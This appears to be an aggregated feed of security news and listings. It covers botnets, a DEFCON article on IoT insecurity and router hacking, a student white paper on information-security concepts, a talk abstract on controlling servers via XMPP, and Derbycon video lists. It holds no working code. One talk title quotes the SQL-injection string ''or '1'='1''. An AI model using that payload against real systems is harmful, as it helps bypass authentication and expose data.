Cybercriminelen grijpen terug naar klassieke aanvalsmethoden om in te breken in de computers en netwerken van bedrijven. In het tiende, jaarlijkse beveiligingsrapport van Cisco (ACR) pieken onder meer adware en spam. Bijna twee e-mails op drie zijn spamberichten, waarvan bijna 10 procent ook malware bevat. Onder impuls van botnets is spam terug op het niveau van 2010.
          Bank-Busting Jihadi Botnet Comes Back To Life. But Who Is Controlling It This Time?        
The powerful botnet Brobot spent almost a year attacking American financial institutions before disappearing as quickly as it appeared. For the last 12 months, it looked as if this dangerous cyber-threat had been defeated for good. Now Brobot is back, security experts have revealed, and it looks as if it [...]
          World's Leading Hackers Explain Why You Don't Want Huge Tech Companies Controlling Everything in Your House        
The internet of things is a way to extract wealth from your every day life.

Is the Internet of Things the next big productivity leap in modern times? Or is it, as it was commonly referred to at DEFCON 25, the Internet of Sh*t?

William Sabin, who describes himself as an “avid trader,” is effusive in his enthusiasm for these new technological developments. In an article evaluating the prospects of General Electric he writes, “The Internet of Things is the most exciting play and why I like GE as much as I do—connecting people, data and machines.” But the security-conscious crowd at DEFCON 25 are not fans.

The buzz word for these devices is “smart,” but what exactly is the Internet of Things? Joe Rozner, a software engineer and featured speaker at DEFCON 25, defines the Internet of Things (IoT) as “everyday devices that are connected to the internet to add functionality.”

The term was coined in 1999 by Kevin Ashton, a British technology pioneer at MIT. But it was presciently forecast by inventor and futurist Nikola Tesla in 1926, “When wireless is perfectly applied the whole earth will be converted into a huge brain … and the instruments through which we shall be able to do this will be amazingly simple ... A man will be able to carry one in his vest pocket."

The first smart device—a toaster that could be turned on and off over the internet—was developed for an earlier tech convention in 1990. Why you need to turn your toaster on and off over the internet is unclear, but in 2017 the list of these programmable objects has expanded exponentially. “Every single device that's being put in your home probably has a computer in it now,” says Christopher Grayson, a security expert and red-team hacker currently working for Snapchat. He lists water bottles, locks and even a WiFi slow cooker as just a few of the items that are being networked.

The Internet of Sh*t Twitter feed rolls out information about these devices, tweeting horror stories about a woman stranded in the country in a smart rental car that won't start without a network. The Twitter account relays a constant stream of weird products—like toilets that glow in the dark—and anecdotes of discomfort, like lightbulbs that have to be reprogrammed before they will turn off and let you go to bed. More dangerously, there is a phone that keeps rebooting when someone is trying to call the fire department.

Grayson says one issue is that many of these companies are small startups trying to move quickly and they don't want to slow down to install more robust security. “The ones that come from big vendors, like Google and Amazon, they are definitely going through security audits, but the vast majority of these devices are just crappy little computers put together by some boot-strap start-up—[and] they haven't actually gotten any of it audited. So generally speaking the security posture of these devices is horrid.”

This turns out to be a problem.

Internal and External Intrusions

In October of 2016 a company called Dyn received tens of millions of attacks from these everyday devices like routers, security cameras and DVRs. Those attacks disrupted many of the major websites that Dyn supported including Twitter, PayPal, Spotify, Netflix, the New York Times and the Wall Street Journal.

Security researchers speculate that these attacks are merely probing around, ahead of larger attacks, and Grayson agrees. When asked if he is anticipating more of these, he says quickly, “Oh, everybody is!”

Unfortunately, massive organized botnet attacks are not the only problem with IoT devices. Not only are they a potential entry point for unwanted intrusion into your home, they are also extruding private information from your home. Companies are acknowledging that they have plans to monetize the data they are collecting from these smart objects. The Internet of Sh*t site quotes the maker of a fridge saying, “We didn’t make a fridge initially to make a ton of money, but in a year or two, it can make revenue, absolutely.” That's one reason the trader William Sabin is so bullish on GE.

One of the fascinating contradictions about the IoT business model that the site points out is that these networked objects are not profitable. They ultimately cost too much to maintain, and so the companies who make them are of necessity exploring alternate revenue streams. Your data is a ready-made product to fill this void.

How will they monetize it? In the case of a fridge, for example, they could sell information about what time and how often you shop. Maybe you always make a grocery run on Saturday, ads that you see on Facebook on Friday night might be more effective. There would be companies willing to pay for that information. It may be useful for consumers to have ads that pop up the day before they shop—there are convenient aspects to machines knowing everything about us. But there are downsides as well.

The release by hackers of the private data of tens of millions of Ashley Madison customers in July of 2015 resulted in blackmail, divorces and even suicides. The company specializes in arranging affairs for married individuals, and when the complete database was released online by hackers, “people found they could be identified not only by their names and their addresses but also by their height, their weight, even their erotic preferences.” The Ashley Madison data was not gathered from smart objects, but it is a pointed reminder of the dangerous combination of massive amounts of personal data combined with poor security.

No Good Answers Right Now

That combination in relation to the Internet of Things is something that is worrying a lot of people in the InfoSec sector. Rozner says he is not aware of any legislation that would require companies to implement strong security protocols. Grayson says, “There are a lot of startups around it. There is no good answer to IoT security right now.” He recommends having a completely different network for all of your smart devices. Rozner says that is something that is typically suggested at the corporate level. He says it may be daunting for most users to manage such a complex setup, “but overall it is a good idea.”

Alina Selyukh, NPR's tech blogger, recommends changing passwords to help with IoT security, and making them strong. Security experts recommend using a string of words or a phrase that has a combination of upper and lower case characters, symbols and numbers. One security website warns that as more people turn to phrases, hackers are focusing on them more, so it's best that your phrase be random and not one that is commonly used. For passwords to be resistant to the latest hacker technology it is possible they need to be at least 23 characters long. Edward Snowden says that an eight-character password can be cracked in under one second.

18 Routers Hacked

What's more fun than hacking into things? Hacking into things while winning serious street cred and cash. DEF CON 25's IoT Village challenged hackers to pit their skills against the security of Small Office/Home Office routers. Eighty-six teams competed to discover the 0-day (undisclosed) vulnerabilities that were required to earn points. Teams were up late into the night, sometimes all night testing their skills against the security provisions that companies had put in place. Ultimately all the routers in the contest fell victim to the hackers. Independent Security Evaluators, the company that organizes the village, claims that the winning team Wolf Pack was able to exploit all 18 routers in play, capturing the “flag” and the $500 prize. Is your router one of the ones they hacked into? You might want to check.

IoT Village says that over the years they have exposed 113 vulnerabilities in connected devices. Melanie Ensign, a volunteer who works with the Con, said that they have informed researchers and device manufacturers about these issues, but clarified that just because a flaw has been exposed does not mean it has been fixed. She said “device manufacturers are notoriously difficult to work with on patching” adding that not every vulnerability can be fixed with a software update. IoT Village does not make these security flaws public for obvious reasons.

 

Related Stories


          CR228: DDOS aus dem IoT-Botnetz        
Der Aufstand der Haushaltsgeräte Twitter? Kaputt. Amazon? Geht nicht! Alles, wegen einer Attacke, die selbst Experten ob ihres schieren Ausmaßes Geheimdiensten oder regierungsnahen Hackern zuschreiben wollte, steckten in Wirklichkeit Haushaltsgeräte. Denn das “Internet of Things”, bestehend aus nützlichen Gerätschaften mit … Weiterlesen
          Information Security        
Scenario...
Information Security White Paper

Watch the Information Technology Security for Small Businesses video from the National Institutes of Standards and Technology (NIST): http://www.youtube.com/watch?v=ajwX-7jVLo0&feature=player_embedded

Then write an information security white paper that can be used to market your firm’s security consulting services to small businesses in the Washington, DC, area. Your white paper must:

Be concise—no more than three pages long.

Provide a general explanation of the business need for information security (protection measures) even in the smallest of businesses (e.g., protect against loss of profit, damage to company’s reputation, costs of litigation, etc.).
Explain information security threats (risks) and vulnerabilities in plain English to small business owners who, while experts in their own business areas, have limited knowledge of computers, networks, and software.
Explain the following key concepts as part of the threats (risks) and vulnerabilities discussion:
confidentiality
integrity
availability
non-repudiation
authentication
authorization

Recommend technologies, processes, and policies that can be used to solve or mitigate one of the following common information security threats (risks):
data breach and/or data theft (confidential client information)
denial-of-service (DOS) attacks
insider theft of intellectual property
deliberate corruption of electronic files (hacker attack or malicious insider) including virus/worm infections

Discuss the impact or results that can be expected:
costs and benefits of effective protection measures
costs and penalties of ineffective or nonexistent protection measures

Proposed solution...

All organizations, whether big or small operate off data whether customers information database, or business operation database. In this document, we provide a general explanation of the business need for information security even in the smallest of businesses, explain information security threats or risks and vulnerabilities, explain the concepts of confidentiality, integrity, availability, non-repudiation, authentication, and authorization. This document also recommends technologies, processes, and policies that can be used to solve or mitigate denial-of-service (DOS) attacks, which can halt a business operation, and finally, discuss costs and benefits of effective protection measures and costs and penalties of ineffective or nonexistent protection measures.

A workplace or business has many assets whether technological or not that contribute to their daily operation. For the most parts, even the non technological assets are somewhat controlled through the use of information technology means. Sometimes, those assets are physical such as workstations, servers, or non physical such as data. Either type of assets is indispensable for a company to secure for the business to continue operating, thus the importance of information security policy. An information security policy should fulfill many purposes. It should: protect people and information; set the rules for expected behavior by users, system administrators, management, and security personnel; authorize security personnel to monitor, probe, and investigate; define and authorize the consequences of violation; define the company consensus baseline stance on security; help minimize risk; and help track compliance with regulations and legislation (Diver, 2006). Also, the existence of information security policies are necessary in order to regulate employees behavior towards the use of a company's electronic communication assets, and at the same time the policies define thresholds for acceptable and unacceptable system security requirements that must be met.

As hackers are taking the fight online, organizations' data face more and more security threats. Some of the emerging threats identified included malware, botnets, cyber warfare, cyber crime economy (Georgia Tech Information Security Center, 2008). For an organization to stay abreast of these information security threats and vulnerabilities, they should continuously implement information security measures to prevent and counter those threats. To do so, an organization should implement security policies in addition to technical controls such as firewalls and antivirus programs. Some other means of securing a network and preventing risks to the network are confidentiality, integrity, availability, non-repudiation, authentication, and authorization.

Confidentiality consists of protecting an information asset by providing access to only authorized users while unauthorized users are denied access. In other words, confidentiality is the privacy of an asset, and can specifically be defined as which people, under what conditions are authorized to access an asset (Purdue University , 2004).

Integrity on the other hand consists of putting controls in place to ensure that data does not get altered during its travel. It makes sure that data as input is output the same way. On a more restrictive view, however, integrity of an information system includes only preservation without corruption of whatever was transmitted or entered into the system, right or wrong (University of Miami, 2008).

Availability represents the requirement that an asset be accessible to authorized person, entity, or device (Purdue University , 2004).

Non-repudiation can be defined as the ability to deny a false rejection or refusal of an obligation with irrefutable evidence (Ainsworth, 2000). The same source provided an excellent example of this matter. It explains the use of non-repudiation by the United States Post Office, USPS. The example states: “A perfect example of a non-repudiation of submission is the service that the USPS provides when you send a registered letter. You are given a receipt that contains an identification number for that piece of mail. If the recipient never receives the mail and claims that you have not sent it, the receipt is the proof that provides the non-repudiation of submission. If the USPS has the receipt of delivery that contains the recipient’s signature, they have provided the proof for the non-repudiation of delivery service. The USPS provides the non-repudiation of transport service by acting as the TTP in the transaction” (Ainsworth, 2000).

Authentication is the mechanism whereby systems may securely identify their users, and it provides answers to the questions pertinent to who the user is and if the user is really who he represents himself to be (Duke University). Authorization, by contrast, is the mechanism by which a system determines what level of access a particular authenticated user should have to secure resources controlled by the system (Duke University). As stated earlier, information security is necessary in mitigating security risks.

Another example of risk or threat that an organization could fell victim of are denial-of-service attacks or DoS attacks. DoS attacks consist of over-flooding a network with information to prevent access to a web page, or email, or other online services. Although there is no definite ways to mitigate such risk, steps can be taken to mitigate or reduce its effects such as installing and maintaining anti-virus software, installing a firewall, and configuring it to restrict traffic coming into and leaving the computer, following good security practices for distributing email address, and applying email filters to help manage unwanted traffic (McDowell, 2009).

With all of the protection measures outlined thus far, effective protection measures benefit an organization in many ways. They help keep data integrity, and ensure that an organization's assets are only accessed by authorized users only. A good data allows for a good business decision by building on previous comparable data to make projections for the future.

A data that has been altered while in transit, or a bad data can mislead an organization to make bad business decision, to plot erroneous data charts, and to make bad business projections. Business decisions derived from bad data could result in unproductive and inefficient company, angry customers, and lawsuits, loss of employees, company shutdown, and damage to reputation.

All in all, all business sizes whether small or big need to protect their data against potential threats and vulnerabilities. An organization needs to protect its assets by applying information security measures as outlined in this document, and at the same time deploy policies and technical controls to ensure a proper use of its assets. As also seen in this document, an organization could be very profitable if it ensures effective protection measures, or be subjected to bad publicity and a potential shutdown if its protection measures are ineffective or nonexistent.

                                                                                  References

Ainsworth, K. (2000, November 8). Non-repudiation – Simple to understand, Difficult to implement. Retrieved July 06, 2011, from Global Information Assurance Certification Paper Web site: www.giac.org

Diver, S. (2006, July 12). Information Security Policy - A Development Guide for Large and Small Companies. Retrieved July 05, 2011, from SANS Institute Web site: sans.org

Duke University. (n.d.). Authentication vs. Authorization. Retrieved July 05, 2011, from Duke University Web site: www.duke.edu

Georgia Tech Information Security Center. (2008, October 15). Emerging Cyber Threats- Report for 2009 Data, Mobility and Questions of Responsibility will Drive Cyber Threats in 2009 and Beyond. Retrieved July 06, 2011, from Georgia Tech Information Security Center Web site: www.gtisc.gatech.edu

McDowell, M. (2009, November 4). Understanding Denial-of-Service Attacks. Retrieved July 06, 2011, from United States Computer Emergency Readiness Team: www.us-cert.gov

Purdue University . (2004, February 23). RASC: Confidentiality, Integrity and Availability (CIA). Retrieved July 05, 2011, from Purdue University Web site: www.itap.purdue.edu

University of Miami. (2008). Confidentiality, Integrity and Availability (CIA). Retrieved July 05, 2011, from University of Miami Web site: www.it.med.miami.edu Up to 60% Off Microsoft Branded
          Washington Post Accidentially Exposes Their Anonymous Botnet Hacker        
Thanks to photo metadata, he’s a sitting duck. read more | digg story
          MyDoom botnet        

This graph visualization shows the propagation of malware through a deliberately infected computer network. Twelve machines in the network were infected to see how the traffic spread to other machines. Over 7800 machines were included in the dataset.
All network in a single chart. Yellow links indicate benign traffic; red links indicate traffic with at least 1 infected packet. Nodes are sized by volume of traffic.
Data taken from the MyDoom-A.tar.gz, available here
Image generated with KeyLines.


          Server Control via Instant Messaging        

We examine the use of XMPP to manage hundreds of servers in various environments.

Cloud infrastructures have provided a great deal of power and versatility, but come at a cost of management overhead. In many cases, a node in a cloud infrastructure has no guarantee of being there at any given moment, has an indeterminable spin up time, and has no way of determining apriori where it will be. These make it hard to coordinate work across the nodes. The typical approach for these setups is to provide an HTTP based registrar. While that works in many cases, the lack of bidirectional communication introduces a bit of ambiguity. What is happening between checkins? Does a node need to unregister itself? What happens when a node goes down? Botnet shepherds have long been dealing with similar problems as cloud shepherds are dealing with now. A botnet node can go down at any time, there is no way to determine when a node will come into the botnet, and botnet nodes come from all over the place. Currently, the primary mechanism that botnet shepherds use to control their networks is over IRC channels. While the primary appeals have been the low barrier to entry, the always on messaging infrastructure, and the inability to lock down the channel, this approach provides an efficient way to coordinate activity in an environment with the above issue with little overhead. Given the similarities between managing a botnet herd and managing a cloud herd, why not use the same management mechanisms that botnets use for more above the board purposes? How well do instant messaging infrastructures work for cloud infrastructures? In this talk, we examine how we can use the botnet herding techniques to manage a large host of servers in a couple of scenarios. We will look at using XMPP as a transport mechanism for a traditional hosting environment as well as a cloud environment.

Cloud infrastructures have provided a great deal of power and versatility, but come at a cost of management overhead. In many cases, a node in a cloud infrastructure has no guarantee of being there at any given moment, has an indeterminable spin up time, and has no way of determining apriori where it will be. These make it hard to coordinate work across the nodes.

The typical approach for these setups is to provide an HTTP based registrar. While that works in many cases, the lack of bidirectional communication introduces a bit of ambiguity. What is happening between checkins? Does a node need to unregister itself? What happens when a node goes down?

Botnet shepherds have long been dealing with similar problems as cloud shepherds are dealing with now. A botnet node can go down at any time, there is no way to determine when a node will come into the botnet, and botnet nodes come from all over the place. Currently, the primary mechanism that botnet shepherds use to control their networks is over IRC channels. While the primary appeals have been the low barrier to entry, the always on messaging infrastructure, and the inability to lock down the channel, this approach provides an efficient way to coordinate activity in an environment with the above issue with little overhead.

Given the similarities between managing a botnet herd and managing a cloud herd, why not use the same management mechanisms that botnets use for more above the board purposes? How well do instant messaging infrastructures work for cloud infrastructures?

In this talk, we examine how we can use the botnet herding techniques to manage a large host of servers in a couple of scenarios. We will look at using XMPP as a transport mechanism for a traditional hosting environment as well as a cloud environment.

Speaker: Chris McEniry
Downloads

                  
Google’s Eric Schmidt: Apple war is over and Android has won | BGR
Is Android Beating iPhone in the Mobile War? Eric Schmidt Thinks So

Galaxy S3 beats iPhone 5 for best device of 2012

Scientists plan test to see if the entire universe is a simulation created by futuristic supercomputers


The Great National Debt Freakout (Explained in Five Minutes)

8 Videogames to Get Your Kid Into Engineering | Game|Life | Wired.com

Arrests over $850m Facebook botnet crime spree

Naughty Dog: We've been asked to push Ellie to the back of the box art | GamesIndustry International
“I feel like they don't put women on the covers because they're afraid that it won't sell,"
Levine: Bioshock box art isn't for fans | GamesIndustry International
Public Buses Across Country Quietly Adding Microphones to Record Passenger Conversations

Tests Call Mislabeled Fish a Widespread Problem in New York

USAF relaunches its first X-37B on a slightly less mysterious spaceflight

Middle-aged men warned to avoid violent exertion after Irishman dies following Gangnam Style dance - Health News, Health - Independent.ie

Way past wonderful gets more wonderful still - The Maddow Blog

'Jedi' religion most popular alternative faith.
“Star Wars” Female Fighter Pilots Cut From Final Films
Steven Moffat Updates On Doctor Who's 50th Anniversary Year
          Here Are Some New Ideas for Fighting Botnets        
It's a tricky problem, so solutions have to be carefully thought out.
          Derbycon 4 Videos        
Link:http://www.irongeek.com/i.php?page=videos/derbycon4/mainlist
These are the videos of the presentations from Derbycon 2014. Big thanks to my video jockeys Skydog, Sabrina, Some Ninja Master, Glenn Barret, Dave Lauer, Jordan Meurer, Brandon Grindatti, Joey, Steven, Branden Miller, Joe, Greg and Night Carnage (and maybe the speakers too I guess).
 

Welcome to the Family – Intro

Johnny Long (Keynote) – Hackers saving the world from the zombie apocalypse

How to Give the Best Pen Test of Your Life (Keynote) – Ed Skoudis

Adaptive Pentesting Part Two (Keynote) – Kevin Mitnick and Dave Kennedy

If it fits – it sniffs: Adventures in WarShipping – Larry Pesce

Abusing Active Directory in Post-Exploitation – Carlos Perez

Quantifying the Adversary: Introducing GuerillaSearch and GuerillaPivot -Dave Marcus

A Year in the (Backdoor) Factory – Joshua Pitts

Ball and Chain (A New Paradigm in Stored Password Security) – Benjamin Donnelly and Tim Tomes

Et tu – Kerberos? – Christopher Campbell

Advanced Red Teaming: All Your Badges Are Belong To Us – Eric Smith

Bypassing Internet Explorer's XSS Filter – Carlos Munoz

 Threat Modeling for Realz – Bruce Potter

A Guided Tour of the Internet Ghetto :: Introduction to Tor Hidden Services – Brent Huston

Red Teaming: Back and Forth – 5ever – Fuzzynop

How not to suck at pen testing – John Strand

Mainframes – Mopeds and Mischief; A PenTesters Year in Review – Tyler Wrightson

The Multibillion Dollar Industry That's Ignored – Jason Montgomery and Ryan Sevey

Code Insecurity or Code in Security – Mano 'dash4rk' Paul

C3CM: Defeating the Command – Control – and Communications of Digital Assailants – Russ McRee

So You Want To Murder a Software Patent – Jason Scott

Leonard Isham – Patching the Human Vulns

Burp For All Languages – Tom Steele

Passing the Torch: Old School Red Teaming – New School Tactics – David McGuire and Will Schroeder

I Am The Cavalry: Year [0] – Space Rogue and Beau Woods

University Education In Security Panel – Bill Gardner (@oncee) – Ray Davidson – Adrian Crenshaw – Sam Liles – Rob Jorgensen

What happened to the 'A'? – How to leverage BCP/DR for your Info Sec Program – Moey

Securing Your Assets from Espionage – Stacey Banks

Subverting ML Detections for Fun and Profit – Ram Shankar Siva Kumar – John Walton

Secrets of DNS – Ron Bowes

Snort & OpenAppID: How to Build an Open Source Next Generation Firewall – Adam Hogan

GET A Grip on Your Hustle: Glassdoor Exfil Toolkit – Parker Schmitt – Kyle Stone (essobi) – Chris Hodges (g11tch)

DNS-Based Authentication of Named Entities (DANE): Can we fix our broken CA model? – Tony Cargile

Exploiting Browsers Like A Boss w/ WhiteLightning! – Bryce Kunz

Real World Intrusion Response – Lessons from the Trenches – Katherine Trame and David Sharpe

Application Whitelisting: Be Careful Where The Silver Bullet Is Aimed – David McCartney

NeXpose For Automated Compromise Detection – Luis "connection" Santana

A girl – some passion – and some tech stuff – Branden Miller and Emily Miller

InfoSec – from the mouth of babes (or an 8 year old) – Reuben A. Paul (RAPstar) and Mano Paul

Why Aim for the Ground? – Teaching Our School Kids All of the Right Computer Skills – Phillip Fitzpatrick

NoSQL Injections: Moving Beyond 'or '1'='1' – Matt Bromiley

SWF Seeking Lazy Admin for Cross Domain Action – Seth Art

Planning for Failure – Noah Beddome

The Social Engineering Savants – The Psychopathic Profile – Kevin Miller

Hiding the breadcrumbs: Forensics and anti-forensics on SAP systems – Juan Perez-Etchegoyen

You're in the butter zone now baby. – Chris Scott

Making BadUSB Work For You – Adam Caudill – Brandon Wilson

PassCrackNet: When everything else fails – just crack hashes. – Adam Ringwood

Vulnerability Assessment 2.0 – John Askew

Social Engineering your progeny to be hackers – Sydney Liles

A Brief History of Exploitation – Devin Cook

Hunting Malware on Linux Production Servers: The Windigo Backstory – Olivier Bilodeau

Interceptor: A PowerShell SSL MITM Script – Casey Smith

Egypt – More New Shiny in the Metasploit Framework

The Human Buffer Overflow aka Amygdala Hijacking – Christopher Hadnagy

Shellcode Time: Come on Grab Your Friends – Wartortell

The Internet Of Insecure Things: 10 Most Wanted List – Paul Asadoorian

DDoS Botnet: 1000 Knives and a Scalpel! – Josh Abraham

wifu^2 – Cameron Maerz

Attacking Microsoft Kerberos: Kicking the Guard Dog of Hades – Tim Medin

Attack Paths: Breaking Into Infosec From IT Or Other Totally Different Fields – Eve Adams and Johnny Xmas

How to Secure and Sys Admin Windows like a Boss. – Jim Kennedy

Red white and blue. Making sense of Red Teaming for good. – Ian Amit

Around the world in 80 Cons – Jayson E. Street

Mirage – Next Gen Honeyports – Adam Crompton and Mick Douglas

Active Directory: Real Defense for Domain Admins – Jason Lang

The Wireless World of the Internet of Things – JP Dunning ".ronin"

Hackers Are People Too – Amanda Berlin (Infosystir)

Ethical Control: Ethics and Privacy in a Target-Rich Environment – Kevin Johnson and James Jardine

The Road to Compliancy Success Plus Plus – James Arlen

Are You a Janitor – Or a Cleaner – "John Stauffacher and Matt Hoy

Practical PowerShell Programming for Professional People – Ben Ten (Ben0xA)

GROK – atlas

How building a better hacker accidentally built a better defender – Casey Ellis

Exploring Layer 2 Network Security in Virtualized Environments – Ronny L. Bull – Dr. Jeanna N. Matthews

Hardware Tamper Resistance: Why and How? – Ryan Lackey

Making Mongo Cry-Attacking NoSQL for Pen Testers – Russell Butturini

Step On In – The Waters Fine! – An Introduction To Security Testing Within A Virtualized Environment – Tom Moore

Give me your data! Obtaining sensitive data without breaking in – Dave Chronister

Third Party Code: FIX ALL THE THINGS – Kymberlee Price – Jake Kouns

Just What The Doctor Ordered? – Scott Erven

Powershell Drink the Kool-Aid – Wayne Pruitt – Zack Wojton

powercat – Mick Douglas

Macro Malware Lives! – Putting the sexy back into MS-Office document macros – Joff Thyer

Girl… Fault Interrupted – Maggie Jauregui

Human Trafficking in the Digital Age – Chris Jenks

Cat Herding in the Wild Wild West: What I Learned Running A Hackercon CFP – Nathaniel Husted

How to Stop a Hack – Jason Samide

We don't need no stinking Internet. – Greg Simo

Hacking the media for fame and profit - Jen Ellis and Steve Ragan

Rafal Los – Things Being a New Parent of Twins Teaches You About Security

ZitMo NoM – David Schwartzberg

Penetrate your OWA – Nate Power

RavenHID: Remote Badge Gathering -or- Why we sit in client bathrooms for hours – Lucas Morris – Adam Zamora

Interns Down for What? – Tony Turner

i r web app hacking (and so can you!) – Brandon Perry

Building a Modern Security Engineering Organization – Zane Lackey

Information Security Team Management: How to keep your edge while embracing the dark side – Stephen C Gay

5min web audit: Security in the startup world – Evan Johnson

Project SCEVRON: SCan EVrything with ruby RONin – Derek Callaway

Soft Skills for a Technical World - Justin Herman

Gone in 60 minutes a Practical Approach to Hacking an Enterprise with Yasuo – Saurabh Harit and Stephen Hall

Snarf – Capitalizing on Man-in-the-Middle – Victor Mata – Josh Stone

Electronic locks in firearms – Oh My! – Travis Hartman

The Achilles Heel Of The American Banking System - Brandon Henery and Andy Robins

It's Not Easy Being Purple – Bill Gardner – Valerie Thomas – Amanda Berlin – Eric Milam – Brandon McCann – Royce Davis

Control Flow Graph Based Virus Scanning – Douglas Goddard

Ok – so you've been pwned – now what? – Jim Wojno

Everybody gets clickjacked: Hard knock lessons on bug bounties – Jonathan Cran

Are you a Beefeater – focused on protecting your crown jewels? – Jack Nichelson

Dolla Dolla Bump Key – Chris Sistrunk

What Dungeons & Dragons Taught Me About INFOSEC – Joey Maresca (l0stkn0wledge)

Gender Differences in Social Engineering: Does Sex Matter? – Shannon Sistrunk – Will Tarkington

Introduction to System Hardening – Eddie David

 Hacking your way into the APRS Network on the Cheap – Mark Lenigan

Building a Web Application Vulnerability Management Program – Jason Pubal

Fighting Back Against SSL Inspection – or How SSL Should Work – Jacob Thompson

Physical Security: From Locks to Dox – Jess Hires

Am I an Imposter? – Warren Kopp

Call of Community: Modern Warfare – Ben Ten and Matt Johnson

The Canary in the Cloud – Scot Bernerv

          Derbycon 3.0 Videos Tracks 3, 4, 5 & Stable Talks Posted        
Link: http://www.irongeek.com/i.php?page=videos/derbycon3/mainlist

Track 3 (Teach Me)
It's Only a Game: Learning Security through Gaming – Bruce Potter
Ooops – Now What? :: The Stolen Data Impact Model (SDIM) – Brent Huston
Anti-Forensics: Memory or something – I forget. – int0x80
The Mysterious Mister Hokum – Jason Scott
Appsec Tl;dr – Gillis Jones
DIY Command & Control For Fun And *No* Profit – David Schwartzberg
IPv6 is here (kind of) – what can I do with it? – Dan Wilkins
Dancing With Dalvik – Thomas Richards
Big Hugs for Big Data – Davi Ottenheimer
Antivirus Evasion: Lessons Learned – thelightcosine
Jared DeMott – Is Auditing C/C++ Different Nowadays?
Getting Schooled: Security with no budget in a hostile environment – Jim Kennedy
Browser Pivoting (FU2FA) – Raphael Mudge
Taking the BDSM out of PCI-DSS Through Open-Source Solutions – Zack Fasel & Erin “SecBarbie” Jacobs
John Strand – Hacking Back – Active Defense and Internet Tough Guys
An Encyclpwnia of Persistence – Skip Duckwall & Will Peteroy
Your Turn! – Johnny Long – HFC
Practical File Format Fuzzing – Jared Allar
Surviving the Dead – Christopher ‘EggDropX’ Payne
How can I do that? Intro to hardware hacking with an RFID badge reader – Kevin Bong
A SysCall to ARMs – Brendan Watters
The Netsniff-NG Toolkit – Jon Schipp
Why Dumpster Dive when I can pwn right in? – Terry Gold

Track 4 (The 3-Way)     
Pigs Don’t Fly – Why owning a typical network is so easy – and how to build a secure one. – Matt “scriptjunkie” Weeks
Finding The Signal in the Noise: Quantifying Advanced Malware – Dave Marcus
Applying the 32 Zombieland Rules to IT Security – Larry Pesce
Windows 0wn3d By Default – Mark Baggett
Android 4.0: Ice Cream “Sudo Make Me a” Sandwich – Max Sobell
Attacking the Next Generation Air Traffic Control System; Hackers – liquor and commercial airliners. – Renderman
Antivirus Evasion through Antigenic Variation (Why the Blacklisting Approach to AV is Broken) – Trenton Iveys
Hello ASM World: A Painless and Contextual Introduction to x86 Assembly – nicolle neulist (rogueclown)
SQL injection with sqlmap – Conrad Reynolds CISA
The Internet of Things: Vulns – Botnets and Detection – Kyle Stone (@essobi) – Liam Randall
The Malware Management Framework – a process you can use to find advanced malware. We found WinNTI with it! – Michael Gough and Ian Robertson
Hack the Hustle! – Eve Adams
Operationalizing Security Intelligence in the Enterprise- Rafal Los
New Shiny in the Metasploit Framework – egypt
Everything you ever wanted to know on how to start a Credit Union – but were afraid to ask. – Jordan Modell
A developer’s guide to pentesting – Bill Sempf
Steal All of the Databases. – Alejandro Caceres
Sandboxes from a pen tester’s view – Rahul Kashyap
iOS Reverse #=> iPWn Apps – Mano ‘dash4rk’ Paul
Terminal Cornucopia – Evan “treefort” Booth
Wait; How is All This Stuff Free?!? – Gene Bransfield

Track 5 – Hybrid Room     
Building An Information Security Awareness Program from Scratch – Bill Gardner – Valerie Thomas
Malware : testing malware scenarios on your network – Tony Huffman (@myne_us) – Juan Cortes (@kongo_86)
Password Intelligence Project – Advanced Password Recovery and Modern Mitigation Strategies – John Moore “Rabid Security”
Tizen Security: Hacking the new mobile OS – Mark Manning (AntiTree)
RAWR – Rapid Assessment of Web Resources – Adam Byers – Tom Moore
Decoding Bug Bounty Programs – Jon Rose
Patching Windows Executables with the Backdoor Factory – Joshua Pitts
Jason Scott – Defcon Documentary Q&A
Panel: Building and Growing a Hacker Space – Joey Maresca – Dave Marcus – Nick Farr – SkyDog
SO Hopelessly Broken: the implications of pervasive vulnerabilities in SOHO router products. – Jacob Holcomb
Put Me In Coach: How We Got Started In Infosec – pr1me – Chris “g11tch” Hodges – Frank Hackett – Dave “ReL1K” Kennedy
Alice Goes Deeper (Down the Rabbit Hole) – Redirection 2.0 – Nathan Magniez
Emergent Vulnerabilities: What ant colonies – schools of fish – and security have in common. – Nathaniel “Dr. Whom” Husted
Why Your IT Bytes – Frank J. Hackett
Using Facial Recognition Software In Digital Forensics And Information Security – Brian Lockrey
How to Fight a War Without Actually Starting One – Brendan O’Connor
Crypto-Exploit Exercises: A tool for reinforcing basic topics in Cryptography – Nancy Snoke

Stable Talks
Gen Y:Getting Them to Talk Rather than Text at Work – Nancy Kovanic
Battle Scars And Friendly Fire: Threat Research Team War Stories – Will Gragido and Seth Geftic
Unmasking Miscreants – Allixon Nixon – Brandon Levene
gitDigger: Creating useful wordlists from public GitHub repositories – Jaime Filson (WiK)
PowerShell and Windows Throw the Best Shell Parties – Piotr Marszalik
Owning Computers Without Shell Access – Royce Davis
Sixnet Tools: for poking at Sixnet Things – Mehdi Sabraoui
Hardening Windows 8 apps for the Windows Store – Bill Sempf
Intro to Dynamic Access Control in Windows Server 2012 – Evan Anderson
Evolutionary Security – Embracing Failure to Attain “Good Enough” – Josh More
DIY Forensics: When Incident Response Morphs into Digital Forensics – John Sammons
ANOTHER Log to Analyze – Utilizing DNS to Discover Malware in Your Network – Nathan Magniez
Phishing Frenzy: 7 seconds from hook to sinker – Brandon <zeknox> McCann
Electronic Safe Fail: Common Vulnerabilities in Electronic Safes – Jeff Popio
The Good Samaritan Identity Protection Project  www.thegsipp.org – Zack Hibbard – Chris Brown and Jon Sternstein
Some defensive ideas from offensive guys. – Justin Elze and Robert Chuvala
Grim Trigger – Jeff “ghostnomad” Kirsch
A n00bie’s perspective on Pentesting… – Brandon Edmunds
My Security is a Graph – Your Argument is Invalid – Gabriel Bassett
Follow the Foolish Zebras: Finding Threats in Your Logs – Chris Larsen
Security Training and Research Cloud (STRC) – Jimmy Murphy
Passive Aggressive Defense – Jason Clark
So you want to be a pentester? – Raymond Gabler
Digital Energy – BPT – Paul Coggin
An Anti-Forensics Primer – Jason Andress
What if Petraeus was a hacker? Email privacy for the rest of us – Phil Cryer (@faker)
 

09/30/2013 Derbycon 3.0 Videos Tracks 1 & 2

I think I have all of tracks 1 and 2 posted:, more to come

Scanning Darkly - HD Moore (keynote)
Kinetic Pwnage: Obliterating the Line Between Computers and the Physical World - Ed Skoudis (keynote)
